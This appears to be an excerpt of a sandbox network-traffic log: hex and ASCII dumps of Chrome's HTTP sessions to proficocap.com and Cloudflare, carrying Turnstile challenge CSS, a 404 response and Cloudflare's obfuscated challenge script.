                                                                          2024-12-08 19:50:37 UTC1369INData Raw: 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23 30
                                                                          Data Ascii: troke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#0
                                                                          2024-12-08 19:50:37 UTC1369INData Raw: 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b
                                                                          Data Ascii: -dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark
                                                                          2024-12-08 19:50:37 UTC1369INData Raw: 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65
                                                                          Data Ascii: 0}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-he
                                                                          2024-12-08 19:50:37 UTC1369INData Raw: 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33
                                                                          Data Ascii: stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de13
                                                                          2024-12-08 19:50:37 UTC1369INData Raw: 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70
                                                                          Data Ascii: y:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-comp
                                                                          2024-12-08 19:50:37 UTC1369INData Raw: 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78
                                                                          Data Ascii: {left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex
                                                                          2024-12-08 19:50:37 UTC1369INData Raw: 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a
                                                                          Data Ascii: lor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          16192.168.2.449767172.67.215.2084431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:37 UTC588OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/2103902929:1733530456:gWlw6UrWrF1EVwazpOoHDdN2NPkECb29gam9UES4p7M/8eef48dc28b04405/Lyh2pldR2U_E_.MUR82KipgfyzNT77WVEZwHtUhweWU-1733687428-1.2.1.1-G7.NbYDLguhv11ABpOVb3tBc0A56ETChg8iDEU7elt4XUzrkd1lpQ9Ezh8w9c7jA HTTP/1.1
                                                                          Host: proficocap.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:38 UTC916INHTTP/1.1 404 Not Found
                                                                          Date: Sun, 08 Dec 2024 19:50:38 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 7
                                                                          Connection: close
                                                                          cf-chl-out: jin/yoKePuVawc7mFp9WEKBotDjynqmzbXU=$jubGaRdAZ8kWo8Ds
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FoFmD6anGQ1F2LCjcBc5m6URlPCGHO7Ol5ZIpHjq2vhrVJ9GTNKYoKqYERLfPaqTiNMCMERYD9Qv2QiQN7t0BhuDpUVmlzx%2FPnVqh1mYbJZat7mR21gCcIpGR5SuBuj4OQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef4917dc3eef9d-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1802&min_rtt=1793&rtt_var=691&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1166&delivery_rate=1563169&cwnd=106&unsent_bytes=0&cid=b06bdaeefe6a3c20&ts=456&x=0"
                                                                          2024-12-08 19:50:38 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                          Data Ascii: invalid


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          17192.168.2.449768104.18.95.414431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:38 UTC728OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8eef4911a8e143cb&lang=auto HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rgsuz/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:38 UTC331INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:50:38 GMT
                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                          Content-Length: 116269
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef491c7c1341a3-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-12-08 19:50:38 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 78 45 4a 58 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c
                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.xEJX4={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcl
                                                                          2024-12-08 19:50:38 UTC1369INData Raw: 65 72 6d 73 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25 33 46 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 74 75 63 6b 25 32 30 68 65 72 65 25 33 46 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 76 65 72 69 66 79 69 6e 67 22 3a 22 56 65 72 69 66 79 69 6e 67 2e 2e 2e 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30
                                                                          Data Ascii: erms","turnstile_feedback_report":"Having%20trouble%3F","turnstile_refresh":"Refresh","turnstile_overrun_description":"Stuck%20here%3F","turnstile_footer_privacy":"Privacy","turnstile_verifying":"Verifying...","check_delays":"Verification%20is%20taking%20
                                                                          2024-12-08 19:50:38 UTC1369INData Raw: 67 6b 2c 67 76 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 66 32 2c 66 33 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 32 34 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 36 34 34 29 29 2f 32 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 36 35 31 29 29 2f 33 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 38 30 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 39 33 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 35 31 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 30 35 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28
                                                                          Data Ascii: gk,gv,gz,gA,gB,gC,gG,gH,f2,f3){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1524))/1+parseInt(gI(644))/2*(parseInt(gI(651))/3)+parseInt(gI(1480))/4+-parseInt(gI(1293))/5*(-parseInt(gI(1351))/6)+-parseInt(gI(605))/7+-parseInt(gI(
                                                                          2024-12-08 19:50:38 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 6b 46 74 53 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 66 4a 53 42 41 27 3a 68 6f 28 31 32 34 39 29 2c 27 7a 70 45 52 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 62 62 6f 4d 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 55 4c 71 5a 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 64 76 6e 55 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 6c 58 4c 68 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 61 6a 76 45 59
                                                                          Data Ascii: nction(h,i){return h<<i},'kFtSs':function(h,i){return h-i},'fJSBA':ho(1249),'zpERc':function(h,i){return i|h},'bboMQ':function(h,i){return h(i)},'ULqZc':function(h,i){return h(i)},'dvnUY':function(h,i){return h-i},'lXLhh':function(h,i){return h(i)},'ajvEY
                                                                          2024-12-08 19:50:38 UTC1369INData Raw: 63 74 5b 68 71 28 31 35 36 35 29 5d 5b 68 71 28 36 32 35 29 5d 5b 68 71 28 36 33 39 29 5d 28 42 2c 43 29 29 7b 69 66 28 64 5b 68 71 28 31 33 35 34 29 5d 28 32 35 36 2c 43 5b 68 71 28 31 34 37 30 29 5d 28 30 29 29 29 7b 69 66 28 64 5b 68 71 28 31 32 39 30 29 5d 28 64 5b 68 71 28 31 30 37 39 29 5d 2c 68 71 28 38 31 32 29 29 29 7b 66 6f 72 28 73 3d 30 3b 73 3c 46 3b 48 3c 3c 3d 31 2c 64 5b 68 71 28 35 34 38 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 68 71 28 31 33 30 39 29 5d 28 64 5b 68 71 28 31 31 32 34 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 68 71 28 31 34 37 30 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 68 71 28 33 31 39 29 5d 28 38 2c 73 29 3b 48 3d 64 5b 68 71 28 37 32 38 29 5d 28 64 5b 68 71 28 32
                                                                          Data Ascii: ct[hq(1565)][hq(625)][hq(639)](B,C)){if(d[hq(1354)](256,C[hq(1470)](0))){if(d[hq(1290)](d[hq(1079)],hq(812))){for(s=0;s<F;H<<=1,d[hq(548)](I,j-1)?(I=0,G[hq(1309)](d[hq(1124)](o,H)),H=0):I++,s++);for(M=C[hq(1470)](0),s=0;d[hq(319)](8,s);H=d[hq(728)](d[hq(2
                                                                          2024-12-08 19:50:38 UTC1369INData Raw: 3c 3c 3d 31 2c 49 3d 3d 64 5b 68 71 28 37 39 33 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 68 71 28 31 33 30 39 29 5d 28 64 5b 68 71 28 35 34 31 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 68 71 28 31 34 37 30 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 48 3c 3c 31 2e 31 34 7c 64 5b 68 71 28 31 35 34 35 29 5d 28 4d 2c 31 29 2c 64 5b 68 71 28 31 30 35 37 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 68 71 28 31 33 30 39 29 5d 28 64 5b 68 71 28 31 36 34 35 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 64 5b 68 71 28 38 30 32 29 5d 28 73 2c 46 29 3b 48 3d 64 5b 68 71 28 37 38 34 29 5d 28 48 2c 31 29 7c 4d
                                                                          Data Ascii: <<=1,I==d[hq(793)](j,1)?(I=0,G[hq(1309)](d[hq(541)](o,H)),H=0):I++,s++);for(M=C[hq(1470)](0),s=0;8>s;H=H<<1.14|d[hq(1545)](M,1),d[hq(1057)](I,j-1)?(I=0,G[hq(1309)](d[hq(1645)](o,H)),H=0):I++,M>>=1,s++);}else{for(M=1,s=0;d[hq(802)](s,F);H=d[hq(784)](H,1)|M
                                                                          2024-12-08 19:50:38 UTC1369INData Raw: 4e 29 7b 66 6f 72 28 68 74 3d 68 6f 2c 73 3d 5b 5d 2c 78 3d 34 2c 42 3d 34 2c 43 3d 33 2c 44 3d 5b 5d 2c 47 3d 64 5b 68 74 28 31 36 34 35 29 5d 28 6f 2c 30 29 2c 48 3d 6a 2c 49 3d 31 2c 45 3d 30 3b 33 3e 45 3b 73 5b 45 5d 3d 45 2c 45 2b 3d 31 29 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 74 28 31 30 35 38 29 5d 28 32 2c 32 29 2c 46 3d 31 3b 46 21 3d 4b 3b 29 66 6f 72 28 4c 3d 64 5b 68 74 28 31 33 32 38 29 5d 5b 68 74 28 31 31 36 34 29 5d 28 27 7c 27 29 2c 4d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4c 5b 4d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 4a 7c 3d 28 30 3c 4e 3f 31 3a 30 29 2a 46 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73
                                                                          Data Ascii: N){for(ht=ho,s=[],x=4,B=4,C=3,D=[],G=d[ht(1645)](o,0),H=j,I=1,E=0;3>E;s[E]=E,E+=1);for(J=0,K=Math[ht(1058)](2,2),F=1;F!=K;)for(L=d[ht(1328)][ht(1164)]('|'),M=0;!![];){switch(L[M++]){case'0':H==0&&(H=j,G=o(I++));continue;case'1':J|=(0<N?1:0)*F;continue;cas
                                                                          2024-12-08 19:50:38 UTC1369INData Raw: 43 29 2c 43 2b 2b 29 7d 7d 7d 2c 67 3d 7b 7d 2c 67 5b 68 6f 28 31 31 34 32 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c 66 32 3d 5b 5d 2c 66 33 3d 30 3b 32 35 36 3e 66 33 3b 66 32 5b 66 33 5d 3d 53 74 72 69 6e 67 5b 67 4a 28 36 30 31 29 5d 28 66 33 29 2c 66 33 2b 2b 29 3b 66 34 3d 28 30 2c 65 76 61 6c 29 28 67 4a 28 39 35 31 29 29 2c 66 35 3d 61 74 6f 62 28 67 4a 28 31 35 37 33 29 29 2c 65 4d 5b 67 4a 28 37 38 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 59 2c 63 2c 64 2c 65 29 7b 68 59 3d 67 4a 2c 63 3d 7b 27 54 5a 46 6d 54 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 54 77 4a 6c 73 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 21 3d 3d 66 7d 2c 27 71 55 6f 45 61 27 3a 68 59 28 32 36 34 29 2c 27 50 77 42
                                                                          Data Ascii: C),C++)}}},g={},g[ho(1142)]=f.h,g}(),f2=[],f3=0;256>f3;f2[f3]=String[gJ(601)](f3),f3++);f4=(0,eval)(gJ(951)),f5=atob(gJ(1573)),eM[gJ(788)]=function(hY,c,d,e){hY=gJ,c={'TZFmT':function(f){return f()},'TwJls':function(f,g){return g!==f},'qUoEa':hY(264),'PwB
                                                                          2024-12-08 19:50:38 UTC1369INData Raw: 4e 5b 69 30 28 35 31 34 29 5d 28 67 5b 69 30 28 31 31 34 33 29 5d 29 2c 6d 3d 6b 5b 69 30 28 31 34 38 33 29 5d 28 69 2c 69 30 28 34 30 36 29 29 2c 6e 3d 65 4d 5b 69 30 28 31 32 38 30 29 5d 5b 69 30 28 31 32 38 36 29 5d 3f 6b 5b 69 30 28 31 34 31 38 29 5d 28 6b 5b 69 30 28 31 31 33 35 29 5d 28 27 68 2f 27 2c 65 4d 5b 69 30 28 31 32 38 30 29 5d 5b 69 30 28 31 32 38 36 29 5d 29 2c 27 2f 27 29 3a 27 27 2c 6f 3d 6b 5b 69 30 28 31 31 37 38 29 5d 28 6b 5b 69 30 28 31 34 31 38 29 5d 28 6b 5b 69 30 28 31 31 33 35 29 5d 28 6b 5b 69 30 28 31 32 37 31 29 5d 28 6b 5b 69 30 28 33 36 35 29 5d 28 6b 5b 69 30 28 33 36 35 29 5d 28 6b 5b 69 30 28 38 32 33 29 5d 2b 6e 2b 6b 5b 69 30 28 31 33 30 38 29 5d 2c 31 29 2c 6b 5b 69 30 28 39 37 31 29 5d 29 2c 65 4d 5b 69 30 28 31 32
                                                                          Data Ascii: N[i0(514)](g[i0(1143)]),m=k[i0(1483)](i,i0(406)),n=eM[i0(1280)][i0(1286)]?k[i0(1418)](k[i0(1135)]('h/',eM[i0(1280)][i0(1286)]),'/'):'',o=k[i0(1178)](k[i0(1418)](k[i0(1135)](k[i0(1271)](k[i0(365)](k[i0(365)](k[i0(823)]+n+k[i0(1308)],1),k[i0(971)]),eM[i0(12
